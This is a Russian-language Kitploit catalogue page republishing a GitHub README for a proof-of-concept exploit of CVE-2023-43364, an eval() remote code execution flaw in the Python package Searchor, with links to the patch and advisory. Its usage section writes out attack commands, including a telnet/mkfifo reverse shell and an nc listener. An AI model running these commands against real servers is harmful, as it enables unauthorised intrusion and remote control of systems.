Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2) | Kitploit
Инструменты/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 месяц назадЕщё не проверено

CVE-2023-43364 – Эксплойт RCE для Searchor (PoC)

Удаленное выполнение кода (RCE) через небезопасное использование eval() в Searchor (< 2.4.2)

Обзор

Этот проект демонстрирует эксплуатацию CVE-2023-43364 — уязвимости удаленного выполнения кода (RCE), затрагивающей Python-пакет Searchor (< 2.4.2).

Проблема вызвана небезопасным использованием eval() для пользовательского ввода, что позволяет злоумышленникам внедрять и выполнять произвольный Python-код.

Уязвимость была устранена путем удаления небезопасного использования eval(), как показано в официальном патче:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

Дополнительные технические детали и уведомление:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

Эта proof-of-concept предоставляет несколько методов выполнения, включая выполнение команд, проверку и обратные оболочки.

Использование

Тестирование RCE

Выполните простую команду (id) для проверки выполнения кода:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

Выполнение произвольной команды

Выполните любую команду на целевом сервере:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

Примеры:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

Обратная оболочка

Запустите слушатель на вашей машине:

root@kitploit:~
nc -lvnp 4444

Запустите эксплойт:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ Отказ от ответственности

Этот проект предназначен для:

  • образовательных целей
  • исследований безопасности
  • только авторизованного тестирования на проникновение

Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.

Используйте этот эксплойт только в контролируемых средах или на системах, на которые у вас есть явное разрешение на тестирование

Скачать инструмент